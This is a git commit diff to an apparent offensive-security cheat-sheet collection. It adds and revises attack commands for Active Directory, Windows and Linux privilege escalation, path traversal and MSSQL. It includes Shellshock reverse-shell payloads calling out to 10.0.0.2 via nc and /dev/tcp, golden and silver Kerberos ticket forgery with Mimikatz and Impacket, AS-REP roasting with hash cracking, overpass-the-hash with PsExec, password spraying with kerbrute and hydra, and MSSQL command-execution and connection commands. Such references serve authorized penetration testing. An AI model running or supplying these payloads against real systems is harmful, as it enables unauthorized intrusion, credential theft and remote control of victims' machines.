Pspy + Silver Ticket + MSSQL connect
parent
4a176615fe
commit
8dffb59ac5
|
@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph
|
||||||
|
|
||||||
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
|
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
|
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
|
||||||
|
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi"
|
||||||
```
|
```
|
||||||
|
|
||||||
## CVE-2017-5638 - Apache Struts 2
|
## CVE-2017-5638 - Apache Struts 2
|
||||||
|
|
|
@ -9,11 +9,13 @@
|
||||||
* [16 bits Unicode encoding](#)
|
* [16 bits Unicode encoding](#)
|
||||||
* [UTF-8 Unicode encoding](#)
|
* [UTF-8 Unicode encoding](#)
|
||||||
* [Bypass "../" replaced by ""](#)
|
* [Bypass "../" replaced by ""](#)
|
||||||
|
* [Bypass "../" with ";"](#)
|
||||||
* [Double URL encoding](#)
|
* [Double URL encoding](#)
|
||||||
* [UNC Bypass](#unc-bypass)
|
* [UNC Bypass](#unc-bypass)
|
||||||
* [Path Traversal](#path-traversal)
|
* [Path Traversal](#path-traversal)
|
||||||
* [Interesting Linux files](#)
|
* [Interesting Linux files](#)
|
||||||
* [Interesting Windows files](#)
|
* [Interesting Windows files](#)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
|
@ -62,6 +64,13 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
|
||||||
...\.\
|
...\.\
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass "../" with ";"
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
..;/
|
||||||
|
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
|
||||||
|
```
|
||||||
|
|
||||||
### Double URL encoding
|
### Double URL encoding
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
@ -46,7 +46,7 @@ http://example.com/index.php?page=../../../etc/passwd
|
||||||
|
|
||||||
### Null byte
|
### Null byte
|
||||||
|
|
||||||
:warning: In versions of PHP below 5.3 we can terminate with null byte.
|
:warning: In versions of PHP below 5.3.4 we can terminate with null byte.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=../../../etc/passwd%00
|
http://example.com/index.php?page=../../../etc/passwd%00
|
||||||
|
|
|
@ -9,8 +9,8 @@
|
||||||
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||||
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||||
* [Password in AD User comment](#password-in-ad-user-comment)
|
* [Password in AD User comment](#password-in-ad-user-comment)
|
||||||
* [Golden Tickets](#passtheticket-golden-tickets)
|
* [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets)
|
||||||
* [Silver Tickets](#passtheticket-silver-tickets)
|
* [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets)
|
||||||
* [Kerberoast](#kerberoast)
|
* [Kerberoast](#kerberoast)
|
||||||
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
|
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
|
||||||
* [Pass-the-Hash](#pass-the-hash)
|
* [Pass-the-Hash](#pass-the-hash)
|
||||||
|
@ -393,31 +393,33 @@ or dump the Active Directory and `grep` the content.
|
||||||
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
|
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
|
||||||
```
|
```
|
||||||
|
|
||||||
### PassTheTicket Golden Tickets
|
### Pass-the-Ticket Golden Tickets
|
||||||
|
|
||||||
Forging a TGT require the krbtgt key
|
Forging a TGT require the krbtgt NTLM hash
|
||||||
|
|
||||||
Mimikatz version
|
> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used.
|
||||||
|
|
||||||
|
#### Using Mimikatz
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Get info - Mimikatz
|
# Get info - Mimikatz
|
||||||
lsadump::dcsync /user:krbtgt
|
lsadump::dcsync /user:krbtgt
|
||||||
lsadump::lsa /inject /name:krbtgt
|
lsadump::lsa /inject /name:krbtgt
|
||||||
|
|
||||||
Forge a Golden ticket - Mimikatz
|
# Forge a Golden ticket - Mimikatz
|
||||||
kerberos::purge
|
kerberos::purge
|
||||||
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
|
||||||
kerberos::tgt
|
kerberos::tgt
|
||||||
```
|
```
|
||||||
|
|
||||||
Meterpreter version
|
#### Using Meterpreter
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Get info - Meterpreter(kiwi)
|
# Get info - Meterpreter(kiwi)
|
||||||
dcsync_ntlm krbtgt
|
dcsync_ntlm krbtgt
|
||||||
dcsync krbtgt
|
dcsync krbtgt
|
||||||
|
|
||||||
Forge a Golden ticket - Meterpreter
|
# Forge a Golden ticket - Meterpreter
|
||||||
load kiwi
|
load kiwi
|
||||||
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
|
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
|
||||||
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
|
||||||
|
@ -426,40 +428,51 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||||||
kerberos_ticket_list
|
kerberos_ticket_list
|
||||||
```
|
```
|
||||||
|
|
||||||
Using a ticket on Linux
|
#### Using a ticket on Linux
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Convert the ticket kirbi to ccache with kekeo
|
# Convert the ticket kirbi to ccache with kekeo
|
||||||
misc::convert ccache ticket.kirbi
|
misc::convert ccache ticket.kirbi
|
||||||
|
|
||||||
Alternatively you can use ticketer from Impacket
|
# Alternatively you can use ticketer from Impacket
|
||||||
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
|
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
|
||||||
|
|
||||||
ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
|
ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
|
||||||
./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
|
./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
|
||||||
|
|
||||||
|
|
||||||
export KRB5CCNAME=/home/user/ticket.ccache
|
export KRB5CCNAME=/home/user/ticket.ccache
|
||||||
cat $KRB5CCNAME
|
cat $KRB5CCNAME
|
||||||
|
|
||||||
|
# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
|
||||||
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
|
|
||||||
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||||
```
|
```
|
||||||
|
|
||||||
### PassTheTicket Silver Tickets
|
If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi
|
||||||
|
Converting ccache => kirbi
|
||||||
|
root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache
|
||||||
|
Converting kirbi => ccache
|
||||||
|
```
|
||||||
|
|
||||||
|
### Pass-the-Ticket Silver Tickets
|
||||||
|
|
||||||
Forging a TGS require machine accound password (key) from the KDC
|
Forging a TGS require machine accound password (key) from the KDC
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Create a ticket for the service
|
# Create a ticket for the service
|
||||||
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
|
mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
|
||||||
/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
|
|
||||||
|
|
||||||
Then use the same steps as a Golden ticket
|
# Examples
|
||||||
misc::convert ccache ticket.kirbi
|
mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
|
||||||
export KRB5CCNAME=/home/user/ticket.ccache
|
mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
|
||||||
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
|
||||||
|
# Then use the same steps as a Golden ticket
|
||||||
|
mimikatz $ misc::convert ccache ticket.kirbi
|
||||||
|
|
||||||
|
root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
|
||||||
|
root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||||
```
|
```
|
||||||
|
|
||||||
### Kerberoast
|
### Kerberoast
|
||||||
|
@ -483,7 +496,7 @@ $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c1
|
||||||
Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
|
Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
|
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Then crack the ticket with hashcat or john
|
Then crack the ticket with hashcat or john
|
||||||
|
@ -499,7 +512,7 @@ If a domain user does not have Kerberos preauthentication enabled, an AS-REP can
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||||
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
|
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
||||||
|
|
||||||
______ _
|
______ _
|
||||||
(_____ \ | |
|
(_____ \ | |
|
||||||
|
@ -527,6 +540,19 @@ v1.3.4
|
||||||
[*] AS-REP hash:
|
[*] AS-REP hash:
|
||||||
|
|
||||||
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
|
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
|
||||||
|
|
||||||
|
C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||||
|
```
|
||||||
|
|
||||||
|
Using `impacket` to get the hash and `hashcat` to crack it.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# extract hashes
|
||||||
|
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
|
||||||
|
root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
|
||||||
|
|
||||||
|
# crack AS_REP messages
|
||||||
|
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Pass-the-Hash
|
### Pass-the-Hash
|
||||||
|
@ -565,22 +591,30 @@ sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm has
|
||||||
|
|
||||||
### OverPass-the-Hash (pass the key)
|
### OverPass-the-Hash (pass the key)
|
||||||
|
|
||||||
Request a TGT with only the NT hash
|
Request a TGT with only the NT hash then you can connect to the machine using the TGT.
|
||||||
|
|
||||||
|
#### Using impacket
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Using impacket
|
root@kali:impacket-examples$ python ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
|
||||||
./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
|
root@kali:impacket-examples$ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
|
||||||
chmod 600 tgwynn.ccache
|
root@kali:impacket-examples$ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
|
||||||
|
|
||||||
also with the AES Key if you have it
|
also with the AES Key if you have it
|
||||||
./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
root@kali:impacket-examples$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
||||||
|
|
||||||
|
|
||||||
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
||||||
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
||||||
klist
|
klist
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Using Rubeus
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\Users\triceratops>.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
|
||||||
|
C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
|
||||||
|
```
|
||||||
|
|
||||||
### Capturing and cracking NTLMv2 hashes
|
### Capturing and cracking NTLMv2 hashes
|
||||||
|
|
||||||
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
||||||
|
@ -817,26 +851,29 @@ Password spraying refers to the attack method that takes a large number of usern
|
||||||
|
|
||||||
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
|
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
|
||||||
|
|
||||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
#### Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||||
|
|
||||||
|
> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||||
|
root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
#### Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||||
```
|
```
|
||||||
|
|
||||||
Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
|
#### Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
||||||
```
|
```
|
||||||
|
|
||||||
Using [hydra]() and [ncrack]() to target RDP services.
|
#### Using [hydra]() and [ncrack]() to target RDP services.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
||||||
|
@ -950,4 +987,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
|
||||||
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
|
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
|
||||||
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
|
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
|
||||||
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
|
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
|
||||||
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
|
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
|
||||||
|
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
|
|
@ -213,6 +213,14 @@ cat /etc/cron.allow
|
||||||
cat /etc/cron.deny*
|
cat /etc/cron.deny*
|
||||||
```
|
```
|
||||||
|
|
||||||
|
You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# print both commands and file system events and scan procfs every 1000 ms (=1sec)
|
||||||
|
./pspy64 -pf -i 1000
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Systemd timers
|
## Systemd timers
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
@ -1,5 +1,18 @@
|
||||||
# Windows - Persistence
|
# Windows - Persistence
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Userland](#userland)
|
||||||
|
* [Registry](#registry)
|
||||||
|
* [Startup](#startup)
|
||||||
|
* [Scheduled Task](#scheduled-task)
|
||||||
|
* [Elevated](#elevated)
|
||||||
|
* [HKLM](#hklm)
|
||||||
|
* [Services](#services)
|
||||||
|
* [Scheduled Task](#scheduled-task)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Userland
|
## Userland
|
||||||
|
|
||||||
### Registry
|
### Registry
|
||||||
|
|
|
@ -424,6 +424,7 @@ Scheduled tasks
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||||||
|
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
||||||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -698,6 +699,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
||||||
### Juicy Potato (abusing the golden privileges)
|
### Juicy Potato (abusing the golden privileges)
|
||||||
|
|
||||||
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||||
|
:warning: Juicy Potato doesn't work in Windows Server 2019.
|
||||||
|
|
||||||
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,23 @@
|
||||||
# MSSQL Injection
|
# MSSQL Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [MSSQL comments](#mssql-comments)
|
||||||
|
* [MSSQL version](#mssql-version)
|
||||||
|
* [MSSQL database name](#mssql-database-name)
|
||||||
|
* [MSSQL List databases](#mssql-list-database)
|
||||||
|
* [MSSQL List columns](#mssql-list-columns)
|
||||||
|
* [MSSQL List tables](#mssql-list-tables)
|
||||||
|
* [MSSQL Extract user/password](#mssql-extract-user-password)
|
||||||
|
* [MSSQL Union Based](#mssql-union-based)
|
||||||
|
* [MSSQL Error Based](#mssql-error-based)
|
||||||
|
* [MSSQL Blind Based](#mssql-blind-based)
|
||||||
|
* [MSSQL Time Based](#mssql-time-based)
|
||||||
|
* [MSSQL Stacked query](#mssql-stack-query)
|
||||||
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
|
* [MSSQL Make user DBA](#mssql-make-user-dba)
|
||||||
|
|
||||||
## MSSQL comments
|
## MSSQL comments
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
|
@ -19,14 +37,14 @@ SELECT @@version
|
||||||
SELECT DB_NAME()
|
SELECT DB_NAME()
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Databases
|
## MSSQL List databases
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
SELECT name FROM master..sysdatabases;
|
SELECT name FROM master..sysdatabases;
|
||||||
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Column
|
## MSSQL List columns
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
||||||
|
@ -35,7 +53,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
|
||||||
SELECT table_catalog, column_name FROM information_schema.columns
|
SELECT table_catalog, column_name FROM information_schema.columns
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Tables
|
## MSSQL List tables
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
||||||
|
@ -45,7 +63,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
|
||||||
SELECT table_catalog, table_name FROM information_schema.columns
|
SELECT table_catalog, table_name FROM information_schema.columns
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL User Password
|
## MSSQL Extract user/password
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
MSSQL 2000:
|
MSSQL 2000:
|
||||||
|
@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1;
|
||||||
RECONFIGURE;
|
RECONFIGURE;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
To interact with the MSSQL instance.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
sqsh -S 192.168.1.X -U sa -P superPassword
|
||||||
|
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
||||||
|
```
|
||||||
|
|
||||||
## MSSQL UNC Path
|
## MSSQL UNC Path
|
||||||
|
|
||||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||||
|
|
|
@ -52,6 +52,7 @@ Simple characters
|
||||||
%3B
|
%3B
|
||||||
)
|
)
|
||||||
Wildcard (*)
|
Wildcard (*)
|
||||||
|
' # required for XML content
|
||||||
```
|
```
|
||||||
|
|
||||||
Multiple encoding
|
Multiple encoding
|
||||||
|
|
Loading…
Reference in New Issue